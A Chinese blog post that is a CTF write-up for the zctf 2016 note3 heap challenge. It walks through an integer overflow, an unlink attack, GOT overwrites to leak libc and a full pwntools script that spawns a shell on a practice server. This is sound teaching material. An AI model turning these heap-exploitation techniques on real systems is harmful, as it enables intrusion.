unlink zctf 2016 note3

最新推荐文章于 2023-06-23 21:22:48 发布
最新推荐文章于 2023-06-23 21:22:48 发布
阅读量2.4k 收藏
点赞数
分类专栏: pwn pwn-heap 文章标签: pwn 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36918532/article/details/122581689
版权

这个跟note2很相似,仍然是一个unlink问题,,,不同的是没法打印泄露了
详情请参考,note2

查看检查
在这里插入图片描述
在IDA里面看,发现其有增加,修改,删除,打印的功能
其中增加的功能
在这里插入图片描述
发现0x6020c0地方存放的是当前堆ptr,0x6020c0[i+8]存放的是其大小
也就是其布局是这样的:cur_ptr | ptr0 | ptr1 | … | ptr6 | cur_size | size_ptr0 | size_ptr…| size_ptr6
在输入size有个函数sub4009b9()中的sub_4008dd()函数中,i被定义为无符号数,所以在做比较的时候会自动向无符号数去转换,最终会导致溢出,其实在note2里面这个问题也存在
并且size只判断了小于0和大于1024的情况,并没有说size=0的情况!!
在这里插入图片描述
在这里插入图片描述

编辑功能
在这里插入图片描述
编辑功能同样用到了sub_4008DD()函数,所以在修改的时候,也存在同样的问题

delete函数
发现清空并且将指针置空了
在这里插入图片描述

利用思路,,通过创建多个堆,构建unlink,然后由于无法直接打印,所以考虑将free->put通过free堆块,来打印一些函数地址(这里使用atoi),进而泄露libc,最后在将atoi->system,进而执行shell

首先创建几个堆(我本来一开始是创建了三个,但是后面把堆都free掉了,不会用了,所以又加了两个,要是限制堆的数量不能大于3的话就GG(我太菜了))

content = 'a'*8 + p64(0x61) + p64(fake_fd) + p64(fake_bk) + 'b'*0x40 + p64(0x60) #two chunk
add(0x80,content) #0

add(0,'c'*0x8) #1  alloc 0x20

add(0x80,'b'*16) #2

add(0x20,'a'*8)#3
add(0x20,'a'*8)#3

add(0x20,'a'*8)#3

这的代码是我直接从note2复制过来了,毕竟思想都一样

这个时候在chunk0里面就伪造好了一个chunk,只要后面将chunk,1,2都删掉的话就会发生合并

然后就删掉chunk1-覆盖chunk2-释放chunk2 (unlink)
其代码:

delete(1)

content = 'a' * 16 + p64(0xa0) + p64(0x90)
add(0,content) #4(location 2)

delete(2)

在这里插入图片描述
释放之后,申请堆块,仍然会在chunk1的位置,溢出修改chunk2的堆头,修改其prev_size和size
在这里插入图片描述
此时ptr地址为:
在这里插入图片描述

然后释放chunk2,此时ptr0指向了0x6020b0(ptr-0x18),然后我们就能随意写了

content = 'd'*0x10+p64(free_got)*2+p64(atoi_got)+p64(0)+p64(atoi_got)*3
edit(0,content)

我们就将free等函数地址写入了ptr0中,同时将atoi写入到了ptr3,4,5中;然后要泄露地址的话得需要printf会put
在这里插入图片描述
在这里插入图片描述
通过如下将put写入到freegot中,

edit(0,p64(puts_plt)[:-1])

delete(3) #== put(atoi_addr)

在这里插入图片描述
然后free(3)就相当于把其atoi地址打印出来了
然后同样的方法,将atoi-》system,这时候再输入bin/sh就可以获得shell了

edit(4,p64(system_addr))

p.sendline('/bin/sh\x00')

在这里插入图片描述
获得shell
在这里插入图片描述
在这里插入图片描述

所有代码:

from pwn import *
#p =process('./zctf_2016_note3')
p = remote('node4.buuoj.cn',28583)
note3 = ELF('./zctf_2016_note3')
libc = ELF('./libc.so.6')
#context.log_level='debug'

def add(size,content):
	p.recvuntil('>>\n')
	p.sendline('1')
	p.recvuntil('1024)')
	p.sendline(str(size))
	p.recvuntil('content:')
	p.sendline(content)


def show():
	p.recvuntil('>>\n')
	p.sendline('2')


def edit(idx,content):
	p.recvuntil('>>\n')
	p.sendline('3')
	p.recvuntil('note:')
	p.sendline(str(idx))
	p.recvuntil('content:')
	p.sendline(content)

def delete(idx):
	p.recvuntil('>>\n')
	p.sendline('4')
	p.recvuntil('note:')
	p.sendline(str(idx))

ptr = 0x6020c8
fake_fd = ptr - 0x18 #0x6020b0  p
fake_bk = ptr - 0x10 #0x6020b8

content = 'a'*8 + p64(0x61) + p64(fake_fd) + p64(fake_bk) + 'b'*0x40 + p64(0x60) #two chunk
add(0x80,content) #0

add(0,'c'*0x8) #1  alloc 0x20

add(0x80,'b'*16) #2

add(0x20,'a'*8)#3
add(0x20,'a'*8)#3

add(0x20,'a'*8)#3


delete(1)

content = 'a' * 16 + p64(0xa0) + p64(0x90)
add(0,content) #4(location 2)

delete(2)
free_got = note3.got['free']
atoi_got = note3.got['atoi']
puts_plt = note3.plt['puts']

print ("free_got is :" ,hex(free_got))  #0x602018
print ("atoi_got is ",hex(atoi_got))    #0x602070
print ("puts_plt is ",hex(puts_plt))    #0x400730

content = 'd'*0x10+p64(free_got)*2+p64(atoi_got)+p64(0)+p64(atoi_got)*3
edit(0,content)


edit(0,p64(puts_plt)[:-1])


delete(3) #== put(atoi_addr)


atoi_addr=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
log.success("atoi_addr is "+hex(atoi_addr)) #0x7fd74beaee90

libcbase=atoi_addr - libc.sym['atoi']

system_addr=libcbase+libc.sym['system']

log.success("system_addr is "+hex(system_addr)) #0x7fd74bebd3a0

print(p64(system_addr))

edit(4,p64(system_addr))

p.sendline('/bin/sh\x00')


#gdb.attach(p)









p.interactive()
是脆脆啊
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
zctf_2016_note3
qq_62887641的博客
08-30 44
然后ptmalloc最小申请的chunk size
BUUCTF zctf_2016_note3
doudoudedi
01-13 481
一道典型的unlink题目整形溢出因为i是无符号长整型如果输入-1就会变得巨大实现堆溢出这里应该可以用unlink泄露libc基址然后用fastbin attack打malloc_hook但是这里有多次写入的edit功能就很好做了 先申请4个chunk 然后unlink一个指针到bss段上 unlink的操作fake chunk的fd和bk必须指回自己也就是一个确定的值具体为 `` fake ch...
2016 ZCTF——note3
04-20 274
64位程序,没开PIE  #unlink #整数溢出 程序逻辑 1 void __fastcall main(__int64 a1, char **a2, char **a3) 2 { 3 setvbuf(stdin, 0LL, 2, 0LL); 4 setvbuf(stdout, 0LL, 2, 0LL); 5 setvbuf(stder...
unlink命令 删除指定文件
01-20
unlink命令用于系统调用函数unlink去删除指定的文件。和rm命令作用一样 ,都是删除文件。 语法格式:unlink [参数] 常用参数: –help 显示帮助 –version 显示版本号 参考实例 删除test文件: [root@...
php中unlink()、mkdir()、rmdir()等方法的使用介绍
10-27
`unlink()`, `mkdir()`, 和 `rmdir()` 是三个关键的函数,用于处理文件和目录的操作。下面将详细介绍这三个函数的用法和注意事项。 1. **unlink() 函数**: `unlink()` 用于删除指定的文件。其基本语法是 `unlink...
堆漏洞之unlink1
08-04
《深入理解堆漏洞:以unlink1为例》 堆漏洞是一种常见的软件安全问题,尤其是在C语言编程中,由于程序员对内存管理不当,可能导致严重的安全风险。本文将深入探讨一种名为"unlink1"的堆漏洞利用技巧,以及其在特定...
Linux unlink函数和删除文件的操作方法
01-09
在Linux系统中,`unlink`函数是用于删除文件或软链接的关键函数。它遵循特定的规则来决定何时真正从磁盘上移除文件内容。理解`unlink`的工作原理有助于我们更好地掌握Linux文件系统的操作。 1. **unlink函数**: `...
php unlink()函数使用教程
10-18
最近在写个网站,需要上传图片,如果修改图片,就图片就没有用了,会占用服务器的硬盘资源,所以想到用unlink函数删除旧照片.下面脚本之家小编给大家带来了php unlink()函数使用教程,感兴趣的朋友一起看看吧
zctf_2016_note3(整数溢出,unlink
m0_51251108的博客
11-06 221
zctf_2016_note3: 好像没show? 逆向分析: 主界面: add函数: show函数: show假的 edit函数: 我们跟进这个函数, size-1跟一个无符号int作比较,如果size为0的话,就能造成任意大小堆溢出 delete函数: 指针释放干净了 思路: 我们申请size为0的chunk堆溢出,伪造chunk,触发unlink,改写free的got表为atoi 在填入/bin/sh exp: from pwn import * #from LibcSearcher i
zctf_2016_note3【buuctf刷题 unlink
最新发布
m0_73756460的博客
06-23 62
zctf_2016_note3【buuctf刷题 unlink
zctf_2016_note3 详解
One_p_Two_w的博客
11-04 545
zctf_2016_note3 详解 题目可以在buu上找到,ibc版本为2.23 和wiki做的不一样,wiki那个我还没看懂,改天再研究研究orz 查看保护机制 题目分析 是个菜单题,提供了新建note、打印note、编辑note、删除note四个功能 添加note ​ 最多添加七个note,每个note大小在0-0x400之间,申请到的堆空间地址会放在ptr指针处 漏洞在edit功能模块 ​ 当a2 = 0时,由于i为unsigned_int,-1相当于无穷大,会造成无限制读入,令我们可以覆盖后面
ZCTF - 2016 - Reverse100
风靡义磊的博客
07-21 1791
ZCTF2016的第一道逆向
2016_ZCTF_Pwn note2(unlink)
Pwnpanda的博客
08-05 588
暑假学习计划 - 0x03 2016_ZCTF_note2 详细分析参考:CTF Wiki 肝了一下午 + 一晚上,还是有一部分还不是很理解: ①为什么payload1后面一定要加上p64(64)+p64(0x60),为什么不能删除或者改大小; ②分配的三个堆块,为什么第一个和第三个大小一定是0x80; 路过的各位大佬,如果知道麻烦指点一些,谢谢啦 from pwn import...
ZCTF2017 WEB Writeup
Bendawang's Blog
02-27 3771
ZCTF2017 WEB Writeup
Linux 二进制漏洞挖掘入门系列之(六)堆块中的 unlink
个人笔记
08-03 935
当我们在使用 free() 函数的时候,就是释放一块内存,这是宏观上的表现。深究起来,堆管理器(ptmalloc)会检查其物理相邻的堆块(chunk)是否空闲,如果空闲,则需要将其从所在的 bin (small bins)中释放出来,与当前 free 的 chunk 进行合并,合并之后,再插入到 unsorted bins 中。在这个过程中,**unlink 就是释放空闲堆块**。这个过程中,如果我们可以构造物理相邻的 chunk,那么就有可能造成**任意地址写**。
Unlink
kelxLZ的博客
07-03 1595
Author:ZERO-A-ONE Date:2021-07-03 一、unlink的原理 简介:俗称脱链,就是将链表头处的free堆块unsorted bin中脱离出来然后和物理地址相邻的新free的堆块合并成大堆块(向前合并或者向后合并),再放入到unsorted bin中 危害原理:通过伪造free状态的fake_chunk,伪造fd指针和bk指针,通过绕过unlink的检测实现unlink,unlink就会往p所在的位置写入p-0x18,从而实现任意地址写的漏洞 漏洞产生原因:off.
c语言中unlink()函数详解
热门推荐
Wmll1234567的博客
08-14 1万+
头文件:#include <unistd.h> 定义函数:int unlink(const char * pathname); 函数说明:unlink()会删除参数pathname 指定的文件. 如果该文件名为最后连接点, 但有其他进程打开了此文件, 则在所有关于此文件的文件描述词皆关闭后才会删除. 如果参数pathname 为一符号连接, 则此连接会被删除。 返回值:成功则返回0, ...
unlink函数
05-24
unlink函数是一个系统调用,用于删除指定的文件名。它的原型如下: ```c #include int unlink(const char *pathname); ``` 其中,pathname表示要删除的文件名。 使用unlink函数删除文件时,需要注意以下几点: ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值